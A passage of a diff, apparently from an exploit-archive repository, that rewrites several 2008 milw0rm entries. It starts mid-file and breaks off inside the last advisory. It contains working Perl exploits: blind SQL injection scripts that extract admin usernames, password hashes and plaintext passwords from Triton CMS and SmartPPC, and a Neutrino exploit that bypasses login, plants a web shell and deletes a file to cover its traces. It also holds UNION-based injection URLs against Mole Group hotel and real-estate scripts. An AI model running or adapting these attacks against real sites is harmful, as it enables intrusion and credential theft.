-			     "CASE WHEN (SELECT ASCII(SUBSTRING(${field}, ${n}, 1)) ".
-			     "FROM ${prefix}members WHERE id=1)=${char} ".
-                 "THEN benchmark(99000000, CHAR(0)) END#"); 
-
-    $res = $client->request($get);
-    
-  return $res->is_success;
-}
-
-# milw0rm.com [2008-07-07]
+#!/usr/bin/perl -w
+#Triton CMS Pro (X-Forwarded-For) Blind SQL Injection
+#Admin's username/hash disclosure exploit
+#Benchmark() method, so take a coffee and relax
+#Coded by __GiReX__
+
+use LWP::UserAgent;
+use HTTP::Request;
+
+if(not defined $ARGV[0])
+{
+	print "\nUsage: perl $0 [host] [path] [1/2]\n";
+	print "Example: perl $0 localhost /tcms/\n";
+	exit;
+}
+
+my $host  = ($ARGV[0] =~ /^http:\/\//) ?  $ARGV[0]:  'http://' . $ARGV[0];
+   $host .=  $ARGV[1] unless not defined $ARGV[1];
+
+my $client =  new LWP::UserAgent;
+my $get    =  new HTTP::Request('GET', $host);
+my @cset   =  (97..122, 0);               # Only  a-z  charset for username exploit if need change it
+my @cset2  =  (48..57, 97..102); 
+my $prefix =  "tc_";         
+
+my ($i, $j) = (0, 1);
+my ($user, $hash) = (undef, undef);
+
+banner();
+
+while($i != $#cset)
+{  
+   for($i = 0; $i <= $#cset; $i++)
+   {
+    my ($pre_time, $post_time) = time();	
+	
+	info(chr($cset[$i]), "Username", $user);
+	$rv = check_char($cset[$i], $j, "username");
+	$post_time = time();	
+	
+	 if($post_time - $pre_time > 3 and $rv)
+	 {
+		$user .= chr($cset[$i]); 
+		last;
+	 }
+   }
+
+  $j++;
+}
+
+if(not defined $user)
+{
+     print STDOUT "\n\n[-] Exploit mistake: please check the benchmark and expected time\n\n";
+	 exit;
+}
+else
+{
+     print STDOUT "\n[+] Admin Hashed Pass: \r";
+}
+
+for($j = 0; $j <= 32; $j++)
+{  
+    for($i = 0; $i <= $#cset2; $i++)
+    {
+     $pre_time = time();	
+	
+	 info(chr($cset2[$i]), "Hashed Pass", $hash);
+	 $rv = check_char($cset2[$i], $j, "password");
+	 $post_time = time();	
+	
+         if($post_time - $pre_time > 3 and $rv)
+	     {
+	         $hash .= chr($cset2[$i]);
+	         last;
+	     }
+    }
+}
+
+if(not defined $hash or length($hash) != 32)
+{
+     print STDOUT "\n\n[-] Exploit mistake: please check the benchmark expected time\n\n";
+}
+else 
+{
+     print STDOUT "\n\n[+] Exploit terminated\n\n";
+}
+
+
+sub banner
+{
+   print "\n";
+   print "[+] Triton CMS Pro (X-Forwarded-For) Blind SQL Injection\n";
+   print "[+] Admin's username/hash disclosure exploit\n";
+   print "[+] Coded by __GiReX__\n";
+   print "\n";
+}
+
+sub info
+{
+  my($c, $str, $cur)  =  @_;
+	
+	$cur = '' unless defined $cur;
+	print  STDOUT "[+] Admin ${str}: ${cur}${c}\r";
+	
+ $| = 1; 
+}
+
+sub check_char
+{
+  my ($char, $n, $field)  =  @_ ;
+   
+    $get->header('X-Forwarded-For' =>  "-1' AND ".
+			     "CASE WHEN (SELECT ASCII(SUBSTRING(${field}, ${n}, 1)) ".
+			     "FROM ${prefix}members WHERE id=1)=${char} ".
+                 "THEN benchmark(99000000, CHAR(0)) END#"); 
+
+    $res = $client->request($get);
+    
+  return $res->is_success;
+}
+
+# milw0rm.com [2008-07-07]
diff --git a/platforms/php/webapps/6018.pl b/platforms/php/webapps/6018.pl
index 796a213d4..889cbe8b0 100755
--- a/platforms/php/webapps/6018.pl
+++ b/platforms/php/webapps/6018.pl
@@ -1,180 +1,180 @@
-#!/usr/bin/perl
-#
-# Neutrino 0.8.4 Atomic Edition Perl exploit
-#
-# discovered & written by Ams
-# ax330d@gmail.com
-#
-# DESCRIPTION:
-# First exploit destroys "/data/sess.php" file (simply strips tags),
-# then we are able to bypass authorization and using admin privelegies
-# our exploit uploads basic shell to "/data/pages/shell_name" and deletes "/data/sess.php".
-# Admin will not see that "/data/sess.php" is deleted (it will be restored back in new auth).
-#
-# USAGE:
-# Run exploit :perl expl.pl http://www.site.com
-#
-# NEEDED:
-# regardless php.ini settings...
-#
-# GREETZ :P
-# Goes to... SLV, to he ( he knows who =)) and 
-# others whom do i know =)
-#
-
-use strict;
-use IO::Socket;
-
-print "\n\t~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-	\n\t\t Neutrino 0.8.4 Atomic Edition exploit
-	\n\t~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n";
-
-if(@ARGV<1){
-	die "\n\tUsage:\texpl.pl [host]\n\n
-	\n\tExample:\texpl.pl http://localhost/blog/\n\n";
-}
-
-my $expl_url = $ARGV[0];
-my $shell = q~
-
-~;
-my $shell_name = 'eof.php'; # or any desired
-
-print "\n\t[~] Starting exploit...\n";
-
-if($expl_url =~ m#http://#){
-	exploit($expl_url);
-} else {
-	exploit('http://'.$expl_url);
-}
-
-sub exploit {
-	
-	#	Defining...
-	my $site = pop @_;
-	my ($a, $b, $c, @d) = split /\//,$site;
-	my $path = join('/',@d);
-	my $host = $c;
-	if($path) {$path = '/'.$path;}
-	my ($length, $packet, $config, $injection);
-	
-	#	Revealing /data/sess.php...
-	print "\n\t[~] Modifying '/data/sess.php'...";
-	$injection = "action=usb&mail=-|\\?|-&p=../sess.php%00";
-	$length = length($injection);
-	$packet = "POST $path/index.php HTTP/1.1\r\n";
-	$packet .= "Host: $host\r\n";
-	$packet .= "Connection: Close\r\n";
-	$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
-	$packet .= "Content-Length: $length\r\n\r\n";
-	$packet .= "$injection";
-	if( ! send_surprise($host, $packet)){
-		die("\n\t[-] Unable to connect to http://$host\n\n");
-	}
-	sleep(1);
-
-	#	Let's cover up traces...
-	$injection = "action=del_pag&pg=../sess.php%00";
-	$length = length($injection);	
-	$packet = "POST $path/index.php HTTP/1.1\r\n";
-	$packet .= "Host: $host\r\n";
-	$packet .= "Connection: Close\r\n";
-	$packet .= "Cookie: sid= \r\n";
-	$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
-	$packet .= "Content-Length: $length\r\n\r\n";
-	$packet .= "$injection";
-	print "\n\t[~] Covering up traces (deleting sess.php) ...";
-	if( ! send_surprise($host,$packet)) {
-		die("\n\t[-] Unable to connect to http://$host\n\n");
-	}
-	sleep(1);
-
-	#	Bypassing auth, creating shell, copying "/data/sess.php"...
-	print "\n\t[~] Bypassing auth, creating shell...";
-	$injection = "action=new_pag&title=$shell_name&text=$shell";
-	$length = length($injection);
-	$packet = "POST $path/index.php HTTP/1.1\r\n";
-	$packet .= "Host: $host\r\n";
-	$packet .= "Connection: close\r\n";
-	$packet .= "Cookie: sid= \r\n";
-	$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
-	$packet .= "Content-Length: $length\r\n\r\n";
-	$packet .= $injection;
-	if( ! send_surprise($host,$packet)){
-		die("\n\t[-] Unable to connect to http://$host\n\n");
-	}
-	sleep(1);
-	
-	#	Finally check for shell
-	print "\n\t[~] Checking for shell...";
-	$packet = "POST $path/data/pages/$shell_name HTTP/1.1\r\n";
-	$packet .= "Host: $host\r\n";
-	$packet .= "Connection: Close\r\n\r\n";
-	if( ! (my $dat = send_surprise($host,$packet,1))){
-		die("\n\t[-] Unable to connect to http://$host (check for shell yourself in $path/data/pages/$shell_name)\n\n");
-	} else {
-		if ($dat =~ /200 OK/){
-			print "\n\t[+] Exploited! (check /data/pages/$shell_name)\n\n";
-		} else {
-			print "\n\t[-] Exploiting failed... (but still check /data/pages/$shell_name =))\n\n";
-		}
-	}
-}
-
-sub send_surprise(){
-		
-	my $dat = 1;
-	my ($host, $packet, $ret) = @_;
-	my $socket=IO::Socket::INET->new(
-		Proto=>"tcp",
-		PeerAddr=>$host,
-		PeerPort=>"80"
-	);
-	if( ! $socket){
-		return 0;
-	} else {
-		
-		print $socket $packet;
-		if($ret){
-			my $rcv;
-			while($rcv = <$socket>){
-			$dat .= $rcv;
-			}
-		}
-		close ($socket);
-		return $dat;
-	}
-}
-
-# milw0rm.com [2008-07-07]
+#!/usr/bin/perl
+#
+# Neutrino 0.8.4 Atomic Edition Perl exploit
+#
+# discovered & written by Ams
+# ax330d@gmail.com
+#
+# DESCRIPTION:
+# First exploit destroys "/data/sess.php" file (simply strips tags),
+# then we are able to bypass authorization and using admin privelegies
+# our exploit uploads basic shell to "/data/pages/shell_name" and deletes "/data/sess.php".
+# Admin will not see that "/data/sess.php" is deleted (it will be restored back in new auth).
+#
+# USAGE:
+# Run exploit :perl expl.pl http://www.site.com
+#
+# NEEDED:
+# regardless php.ini settings...
+#
+# GREETZ :P
+# Goes to... SLV, to he ( he knows who =)) and 
+# others whom do i know =)
+#
+
+use strict;
+use IO::Socket;
+
+print "\n\t~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+	\n\t\t Neutrino 0.8.4 Atomic Edition exploit
+	\n\t~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n";
+
+if(@ARGV<1){
+	die "\n\tUsage:\texpl.pl [host]\n\n
+	\n\tExample:\texpl.pl http://localhost/blog/\n\n";
+}
+
+my $expl_url = $ARGV[0];
+my $shell = q~
+
+~;
+my $shell_name = 'eof.php'; # or any desired
+
+print "\n\t[~] Starting exploit...\n";
+
+if($expl_url =~ m#http://#){
+	exploit($expl_url);
+} else {
+	exploit('http://'.$expl_url);
+}
+
+sub exploit {
+	
+	#	Defining...
+	my $site = pop @_;
+	my ($a, $b, $c, @d) = split /\//,$site;
+	my $path = join('/',@d);
+	my $host = $c;
+	if($path) {$path = '/'.$path;}
+	my ($length, $packet, $config, $injection);
+	
+	#	Revealing /data/sess.php...
+	print "\n\t[~] Modifying '/data/sess.php'...";
+	$injection = "action=usb&mail=-|\\?|-&p=../sess.php%00";
+	$length = length($injection);
+	$packet = "POST $path/index.php HTTP/1.1\r\n";
+	$packet .= "Host: $host\r\n";
+	$packet .= "Connection: Close\r\n";
+	$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
+	$packet .= "Content-Length: $length\r\n\r\n";
+	$packet .= "$injection";
+	if( ! send_surprise($host, $packet)){
+		die("\n\t[-] Unable to connect to http://$host\n\n");
+	}
+	sleep(1);
+
+	#	Let's cover up traces...
+	$injection = "action=del_pag&pg=../sess.php%00";
+	$length = length($injection);	
+	$packet = "POST $path/index.php HTTP/1.1\r\n";
+	$packet .= "Host: $host\r\n";
+	$packet .= "Connection: Close\r\n";
+	$packet .= "Cookie: sid= \r\n";
+	$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
+	$packet .= "Content-Length: $length\r\n\r\n";
+	$packet .= "$injection";
+	print "\n\t[~] Covering up traces (deleting sess.php) ...";
+	if( ! send_surprise($host,$packet)) {
+		die("\n\t[-] Unable to connect to http://$host\n\n");
+	}
+	sleep(1);
+
+	#	Bypassing auth, creating shell, copying "/data/sess.php"...
+	print "\n\t[~] Bypassing auth, creating shell...";
+	$injection = "action=new_pag&title=$shell_name&text=$shell";
+	$length = length($injection);
+	$packet = "POST $path/index.php HTTP/1.1\r\n";
+	$packet .= "Host: $host\r\n";
+	$packet .= "Connection: close\r\n";
+	$packet .= "Cookie: sid= \r\n";
+	$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
+	$packet .= "Content-Length: $length\r\n\r\n";
+	$packet .= $injection;
+	if( ! send_surprise($host,$packet)){
+		die("\n\t[-] Unable to connect to http://$host\n\n");
+	}
+	sleep(1);
+	
+	#	Finally check for shell
+	print "\n\t[~] Checking for shell...";
+	$packet = "POST $path/data/pages/$shell_name HTTP/1.1\r\n";
+	$packet .= "Host: $host\r\n";
+	$packet .= "Connection: Close\r\n\r\n";
+	if( ! (my $dat = send_surprise($host,$packet,1))){
+		die("\n\t[-] Unable to connect to http://$host (check for shell yourself in $path/data/pages/$shell_name)\n\n");
+	} else {
+		if ($dat =~ /200 OK/){
+			print "\n\t[+] Exploited! (check /data/pages/$shell_name)\n\n";
+		} else {
+			print "\n\t[-] Exploiting failed... (but still check /data/pages/$shell_name =))\n\n";
+		}
+	}
+}
+
+sub send_surprise(){
+		
+	my $dat = 1;
+	my ($host, $packet, $ret) = @_;
+	my $socket=IO::Socket::INET->new(
+		Proto=>"tcp",
+		PeerAddr=>$host,
+		PeerPort=>"80"
+	);
+	if( ! $socket){
+		return 0;
+	} else {
+		
+		print $socket $packet;
+		if($ret){
+			my $rcv;
+			while($rcv = <$socket>){
+			$dat .= $rcv;
+			}
+		}
+		close ($socket);
+		return $dat;
+	}
+}
+
+# milw0rm.com [2008-07-07]
diff --git a/platforms/php/webapps/6019.pl b/platforms/php/webapps/6019.pl
index 7d812a452..8eceefb18 100755
--- a/platforms/php/webapps/6019.pl
+++ b/platforms/php/webapps/6019.pl
@@ -1,210 +1,210 @@
-#!/usr/bin/perl -W
- 
-# SmartPPC Pay Per Click Script Blind SQL Injection Exploit
-# File affected: directory.php ($idDirectory)
-#
-# Vulnerability: Hamtaro
-# Exploit: ka0x 
-#
-#
-# ka0x@domlabs:~$ ./smartppc.pl -u "http://localhost/directory.php?username=&idDirectory=2" -p Top
-# [i] Getting default: -T 30
-# [i] Getting default: -l 200
-# [i] Getting default: -t 15
-# 18 118 v
-# [!] $EXIT_IF_NO_CHAR : I can't find a valid character, position 18.
-# [i] USER / PASSWORD:
-# ka0x / test12345_
-#
-
-# special thanks: NullWave07, an0de, Piker, Xarnuz
- 
-
-my $MAX_FIELD_LENGTH = 200 ;
-my $EXIT_IF_NO_CHAR = 1 ;
-my $DEFAULT_THREADS = 15 ;
-my $DEFAULT_THREADS_TIMEOUT = 30 ;
-my @ascii = ( 32 .. 123 ) ;
-my $DEFAULT_THREADS_TIME = 1 ;
-
- 
-use LWP::UserAgent ;
- 
-sub _HELP_AND_EXIT
-{
-    die "
- 
-  ./$0 -u  -p 
- 
- Options:
-  -u                   Ex: http://localhost/directory.php?username=&idDirectory=58
-  -p               HTML pattern.
- 
- Other:
-  -t    <#>                 Threads, default '$DEFAULT_THREADS'.
-  -l    <#>                 Maximum table name length '$MAX_FIELD_LENGTH'.
-  -T    <#>                 Timeout.
-  -h                        Help (also with --help).
- 
-  Example:
- 
-  ./$0 -u \"http://localhost/directory.php?username=&idDirectory=2\" -p Top
- 
-" ;
-}
- 
- 
-    my ($p, $w) = ({ @ARGV }, { }) ;
- 
-    map {
-        &_HELP_AND_EXIT if $_ eq '--help' or $_ eq '-h' ;
-    } keys %$p ;
- 
-    map {
-        die "[!] Require: $_\n[!] Help: ./$0 --help\n" unless $p->{ $_ } ;
-    } qw/-u -p/ ;
- 
-    $p->{'-t'} = ( $p->{'-t'} and $p->{'-t'} =~ /^\d+$/ ) ? $p->{'-t'} : ( $w->{'-t'} = $DEFAULT_THREADS ) ;
-    $p->{'-l'} = ( $p->{'-l'} and $p->{'-l'} =~ /^\d+$/ ) ? $p->{'-l'} : ( $w->{'-l'} = $MAX_FIELD_LENGTH ) ;
-    $p->{'-T'} = ( $p->{'-T'} and $p->{'-T'} =~ /^\d+$/ ) ? $p->{'-T'} : ( $w->{'-T'} = $DEFAULT_THREADS_TIMEOUT ) ;
- 
-    map {
-        warn "[i] Getting default: $_ $w->{ $_ }\n" ;
-    } sort keys %$w ;
- 
-    ( &_IS_VULN( $p ) ) ? &_START_WORK( $p ) : die "[i] Bad pattern ? Isn't vulnerable ?\n" ;
- 
- 
- 
- 
-sub _START_WORK
-{
-    my $p = shift ;
- 
-    my $position = 1 ;
- 
-    pipe(R, W) ;
-    pipe(Rs, Ws) ;
-    autoflush STDOUT 1 ;
- 
-    my $sql_message = '' ;
-    my $msg = '' ;
-    my @pid ;
- 
-    while( $position <= $p->{'-l'} )
-    {
-        my $cf ;
-        unless( $cf = fork ){ &_CHECKING( $p, $position ) ; exit(0) ; }
-        push(@pid, $cf) ;
- 
-        my $count = 0 ;
-        my $can_exit ;
-        my $char_printed ;
- 
-        while()
-        {
-            chomp ;
-            push(@pid, (split(/:/))[1] ) if /^pid/ ;
- 
-            my ($res, $pos, $ascii) = ( split(/ /, $_) ) ;
-            $count++ if $pos == $position ;
- 
-            print "\b" x length($msg), ($msg = "$position $ascii " . chr($ascii) ) ;
- 
-            if( $res eq 'yes' and $pos == $position ){
-                    $char_printed = $can_exit = 1 ;
-                    print Ws "STOP $position\n" ;
-                    $sql_message .= chr( $ascii ) ;
-            }
- 
-            last if ( $can_exit or $count == @ascii );
-        }
- 
-        map { waitpid($_, 0) } @pid ;
- 
-        unless( $char_printed )
-        {
-            if( $EXIT_IF_NO_CHAR )
-            {
-                warn "\n[!] \$EXIT_IF_NO_CHAR : I can't find a valid character, position $position.\n"  ;
-                last ;
-            }
-        }
- 
-        $position++ ;
-    }
- 
-    print "[i] USER / PASSWORD:\n$sql_message\n" ;
- 
-}
- 
-sub _CHECKING
-{
-    my ($p, $position) = @_ ;
-    my $counter = 0 ;
-    my $stop_position ;
- 
-    foreach my $ascii ( @ascii )
-    {
-        $counter++ ;
- 
-        if( $counter % $p->{'-t'} == 0 )
-        {
-            my $stop_position ;
-            eval
-            {
-                $SIG{'ALRM'} = sub { die "non_stop\n" } ;
-                alarm $DEFAULT_THREADS_TIME ;
-                my $line =  ;
-                $stop_position = (split( / /, $line))[1] ;
-                alarm 0 ;
-            } ;
- 
-            if( ($stop_position) and $stop_position == $position ){ print "\nnext position\n" ; exit(0) ; }
-        }
- 
-        unless(my $pid = fork )
-        {
-            print Ws "pid:$pid\n" or die ;
- 
- 
-            my $url = $p->{'-u'} .
-                ' AND ascii(substring((SELECT CONCAT(username,0x202f20,pass) FROM users LIMIT 0,1),' . $position . ',1))='. $ascii ;
- 
-            my $ua = LWP::UserAgent->new ;
-            $ua->timeout( $p->{'-T'} ) ;
- 
-            my $content ;
-            while( 1 )
-            {
-                last if $content = $ua->get( $url )->content ;
-            }
- 
-            ( $content =~ /$p->{'-p'}/ ) ? print W "yes $position $ascii\n" : print W "no $position $ascii\n" ;
- 
-            exit( 0 ) ;
-        }
- 
-    }
-}
- 
- 
- 
-sub _IS_VULN
-{
-    my $p = shift ;
- 
-    my $ua = LWP::UserAgent->new ;
-    $ua->timeout( $p->{'-T'} ) ;
- 
-    my ( $one, $two ) = (
-        $ua->get( $p->{'-u'}." AND 1=1")->content ,
-        $ua->get( $p->{'-u'}." AND 1=2")->content ,
-    ) ;
- 
-    return ($one =~ /$p->{'-p'}/ and $two !~ /$p->{'-p'}/) ? 1 : undef ;
-}
-
-__END__
-
-# milw0rm.com [2008-07-07]
+#!/usr/bin/perl -W
+ 
+# SmartPPC Pay Per Click Script Blind SQL Injection Exploit
+# File affected: directory.php ($idDirectory)
+#
+# Vulnerability: Hamtaro
+# Exploit: ka0x 
+#
+#
+# ka0x@domlabs:~$ ./smartppc.pl -u "http://localhost/directory.php?username=&idDirectory=2" -p Top
+# [i] Getting default: -T 30
+# [i] Getting default: -l 200
+# [i] Getting default: -t 15
+# 18 118 v
+# [!] $EXIT_IF_NO_CHAR : I can't find a valid character, position 18.
+# [i] USER / PASSWORD:
+# ka0x / test12345_
+#
+
+# special thanks: NullWave07, an0de, Piker, Xarnuz
+ 
+
+my $MAX_FIELD_LENGTH = 200 ;
+my $EXIT_IF_NO_CHAR = 1 ;
+my $DEFAULT_THREADS = 15 ;
+my $DEFAULT_THREADS_TIMEOUT = 30 ;
+my @ascii = ( 32 .. 123 ) ;
+my $DEFAULT_THREADS_TIME = 1 ;
+
+ 
+use LWP::UserAgent ;
+ 
+sub _HELP_AND_EXIT
+{
+    die "
+ 
+  ./$0 -u  -p 
+ 
+ Options:
+  -u                   Ex: http://localhost/directory.php?username=&idDirectory=58
+  -p               HTML pattern.
+ 
+ Other:
+  -t    <#>                 Threads, default '$DEFAULT_THREADS'.
+  -l    <#>                 Maximum table name length '$MAX_FIELD_LENGTH'.
+  -T    <#>                 Timeout.
+  -h                        Help (also with --help).
+ 
+  Example:
+ 
+  ./$0 -u \"http://localhost/directory.php?username=&idDirectory=2\" -p Top
+ 
+" ;
+}
+ 
+ 
+    my ($p, $w) = ({ @ARGV }, { }) ;
+ 
+    map {
+        &_HELP_AND_EXIT if $_ eq '--help' or $_ eq '-h' ;
+    } keys %$p ;
+ 
+    map {
+        die "[!] Require: $_\n[!] Help: ./$0 --help\n" unless $p->{ $_ } ;
+    } qw/-u -p/ ;
+ 
+    $p->{'-t'} = ( $p->{'-t'} and $p->{'-t'} =~ /^\d+$/ ) ? $p->{'-t'} : ( $w->{'-t'} = $DEFAULT_THREADS ) ;
+    $p->{'-l'} = ( $p->{'-l'} and $p->{'-l'} =~ /^\d+$/ ) ? $p->{'-l'} : ( $w->{'-l'} = $MAX_FIELD_LENGTH ) ;
+    $p->{'-T'} = ( $p->{'-T'} and $p->{'-T'} =~ /^\d+$/ ) ? $p->{'-T'} : ( $w->{'-T'} = $DEFAULT_THREADS_TIMEOUT ) ;
+ 
+    map {
+        warn "[i] Getting default: $_ $w->{ $_ }\n" ;
+    } sort keys %$w ;
+ 
+    ( &_IS_VULN( $p ) ) ? &_START_WORK( $p ) : die "[i] Bad pattern ? Isn't vulnerable ?\n" ;
+ 
+ 
+ 
+ 
+sub _START_WORK
+{
+    my $p = shift ;
+ 
+    my $position = 1 ;
+ 
+    pipe(R, W) ;
+    pipe(Rs, Ws) ;
+    autoflush STDOUT 1 ;
+ 
+    my $sql_message = '' ;
+    my $msg = '' ;
+    my @pid ;
+ 
+    while( $position <= $p->{'-l'} )
+    {
+        my $cf ;
+        unless( $cf = fork ){ &_CHECKING( $p, $position ) ; exit(0) ; }
+        push(@pid, $cf) ;
+ 
+        my $count = 0 ;
+        my $can_exit ;
+        my $char_printed ;
+ 
+        while()
+        {
+            chomp ;
+            push(@pid, (split(/:/))[1] ) if /^pid/ ;
+ 
+            my ($res, $pos, $ascii) = ( split(/ /, $_) ) ;
+            $count++ if $pos == $position ;
+ 
+            print "\b" x length($msg), ($msg = "$position $ascii " . chr($ascii) ) ;
+ 
+            if( $res eq 'yes' and $pos == $position ){
+                    $char_printed = $can_exit = 1 ;
+                    print Ws "STOP $position\n" ;
+                    $sql_message .= chr( $ascii ) ;
+            }
+ 
+            last if ( $can_exit or $count == @ascii );
+        }
+ 
+        map { waitpid($_, 0) } @pid ;
+ 
+        unless( $char_printed )
+        {
+            if( $EXIT_IF_NO_CHAR )
+            {
+                warn "\n[!] \$EXIT_IF_NO_CHAR : I can't find a valid character, position $position.\n"  ;
+                last ;
+            }
+        }
+ 
+        $position++ ;
+    }
+ 
+    print "[i] USER / PASSWORD:\n$sql_message\n" ;
+ 
+}
+ 
+sub _CHECKING
+{
+    my ($p, $position) = @_ ;
+    my $counter = 0 ;
+    my $stop_position ;
+ 
+    foreach my $ascii ( @ascii )
+    {
+        $counter++ ;
+ 
+        if( $counter % $p->{'-t'} == 0 )
+        {
+            my $stop_position ;
+            eval
+            {
+                $SIG{'ALRM'} = sub { die "non_stop\n" } ;
+                alarm $DEFAULT_THREADS_TIME ;
+                my $line =  ;
+                $stop_position = (split( / /, $line))[1] ;
+                alarm 0 ;
+            } ;
+ 
+            if( ($stop_position) and $stop_position == $position ){ print "\nnext position\n" ; exit(0) ; }
+        }
+ 
+        unless(my $pid = fork )
+        {
+            print Ws "pid:$pid\n" or die ;
+ 
+ 
+            my $url = $p->{'-u'} .
+                ' AND ascii(substring((SELECT CONCAT(username,0x202f20,pass) FROM users LIMIT 0,1),' . $position . ',1))='. $ascii ;
+ 
+            my $ua = LWP::UserAgent->new ;
+            $ua->timeout( $p->{'-T'} ) ;
+ 
+            my $content ;
+            while( 1 )
+            {
+                last if $content = $ua->get( $url )->content ;
+            }
+ 
+            ( $content =~ /$p->{'-p'}/ ) ? print W "yes $position $ascii\n" : print W "no $position $ascii\n" ;
+ 
+            exit( 0 ) ;
+        }
+ 
+    }
+}
+ 
+ 
+ 
+sub _IS_VULN
+{
+    my $p = shift ;
+ 
+    my $ua = LWP::UserAgent->new ;
+    $ua->timeout( $p->{'-T'} ) ;
+ 
+    my ( $one, $two ) = (
+        $ua->get( $p->{'-u'}." AND 1=1")->content ,
+        $ua->get( $p->{'-u'}." AND 1=2")->content ,
+    ) ;
+ 
+    return ($one =~ /$p->{'-p'}/ and $two !~ /$p->{'-p'}/) ? 1 : undef ;
+}
+
+__END__
+
+# milw0rm.com [2008-07-07]
diff --git a/platforms/php/webapps/6021.txt b/platforms/php/webapps/6021.txt
index 34cd2dc83..410f8898d 100755
--- a/platforms/php/webapps/6021.txt
+++ b/platforms/php/webapps/6021.txt
@@ -1,55 +1,55 @@
--[*]+================================================================================+[*]-
--[*]+	     Mole Group Hotel Script 1.0 Remote SQL Injection Vulnerability          +[*]-
--[*]+================================================================================+[*]-
-
-
-
-[*] Discovered By: t0pP8uZz
-[*] Discovered On: 8 JULY 2008
-[*] Script Download: http://www.mole-group.com/content/view/44/59/
-[*] DORK: N/A
-
-
-
-[*] Vendor Has Not Been Notified!
-
-
-
-[*] DESCRIPTION: 
-
-	Mole Group Hotel Script suffers from a insecure mysql query in the "file" variable.
-	This can lead to malicous users arbitrary selecting confidential information from the database.
-
-	See below for the SQL injection.
-
-
-
-[*] SQL Injection:
-
-	http://site.com/index.php?file=1/**/UNION/**/ALL/**/SELECT/**/1,CONVERT(name/**/using/**/latin1),3,4/**/FROM/**/settings/*
-
-
-
-[*] NOTE/TIP: 
-
-	admin login is at /admin/
-
-
-
-[*] GREETZ: 
-
-	milw0rm.com, h4ck-y0u.org, Offensive-Security.com, CipherCrew !
-
-
-
-[-] Peace...
-
-	...t0pP8uZz !
-
-
-
--[*]+================================================================================+[*]-
--[*]+	     Mole Group Hotel Script 1.0 Remote SQL Injection Vulnerability          +[*]-
--[*]+================================================================================+[*]-
-
-# milw0rm.com [2008-07-08]
+-[*]+================================================================================+[*]-
+-[*]+	     Mole Group Hotel Script 1.0 Remote SQL Injection Vulnerability          +[*]-
+-[*]+================================================================================+[*]-
+
+
+
+[*] Discovered By: t0pP8uZz
+[*] Discovered On: 8 JULY 2008
+[*] Script Download: http://www.mole-group.com/content/view/44/59/
+[*] DORK: N/A
+
+
+
+[*] Vendor Has Not Been Notified!
+
+
+
+[*] DESCRIPTION: 
+
+	Mole Group Hotel Script suffers from a insecure mysql query in the "file" variable.
+	This can lead to malicous users arbitrary selecting confidential information from the database.
+
+	See below for the SQL injection.
+
+
+
+[*] SQL Injection:
+
+	http://site.com/index.php?file=1/**/UNION/**/ALL/**/SELECT/**/1,CONVERT(name/**/using/**/latin1),3,4/**/FROM/**/settings/*
+
+
+
+[*] NOTE/TIP: 
+
+	admin login is at /admin/
+
+
+
+[*] GREETZ: 
+
+	milw0rm.com, h4ck-y0u.org, Offensive-Security.com, CipherCrew !
+
+
+
+[-] Peace...
+
+	...t0pP8uZz !
+
+
+
+-[*]+================================================================================+[*]-
+-[*]+	     Mole Group Hotel Script 1.0 Remote SQL Injection Vulnerability          +[*]-
+-[*]+================================================================================+[*]-
+
+# milw0rm.com [2008-07-08]
diff --git a/platforms/php/webapps/6022.txt b/platforms/php/webapps/6022.txt
index 24de6f235..155cf8a93 100755
--- a/platforms/php/webapps/6022.txt
+++ b/platforms/php/webapps/6022.txt
@@ -1,58 +1,58 @@
--[*]+================================================================================+[*]-
--[*]+	       Real Estate Script <= 1.1 Remote SQL Injection Vulnerability	     +[*]-
--[*]+================================================================================+[*]-
-
-
-
-[*] Discovered By: t0pP8uZz
-[*] Discovered On: 8 JULY 2008
-[*] Script Download: http://www.mole-group.com/content/view/41/55/
-[*] DORK: N/A
-
-
-
-[*] Vendor Has Not Been Notified!
-
-
-
-[*] DESCRIPTION: 
-
-	Real Estate Script from mole-group.com contains a insecure mysql query flaw, which 
-	allows a remote attacker to execute arbitrary mysql querys and gaining access to confidential information.
-	like username, passwords, email address's etc.
-
-	see below for a example.
-
-
-
-[*] SQL Injection:
-
-
-	http://site.com/index.php?go=listings&listing_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,CONVERT(CONCAT(0x3C666F6E7420636F6C6F723D7265643E,username,0x3a,password,0x3C2F666F6E743E)/**/using/**/latin1),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/**/FROM/**/users/**/LIMIT/**/0,1/*
-
-
-
-[*] NOTE/TIP: 
-
-	admin login is at /admin/
-	passwords are in plaintext
-
-
-
-[*] GREETZ: 
-
-	milw0rm.com, h4ck-y0u.org, Offensive-Security.com, CipherCrew !
-
-
-
-[-] Peace...
-
-	...t0pP8uZz !
-
-
-
--[*]+================================================================================+[*]-
--[*]+	       Real Estate Script <= 1.1 Remote SQL Injection Vulnerability	     +[*]-
--[*]+================================================================================+[*]-
-
-# milw0rm.com [2008-07-08]
+-[*]+================================================================================+[*]-
+-[*]+	       Real Estate Script <= 1.1 Remote SQL Injection Vulnerability	     +[*]-
+-[*]+================================================================================+[*]-
+
+
+
+[*] Discovered By: t0pP8uZz
+[*] Discovered On: 8 JULY 2008
+[*] Script Download: http://www.mole-group.com/content/view/41/55/
+[*] DORK: N/A
+
+
+
+[*] Vendor Has Not Been Notified!
+
+
+
+[*] DESCRIPTION: 
+
+	Real Estate Script from mole-group.com contains a insecure mysql query flaw, which 
+	allows a remote attacker to execute arbitrary mysql querys and gaining access to confidential information.
+	like username, passwords, email address's etc.
+
+	see below for a example.
+
+
+
+[*] SQL Injection:
+
+
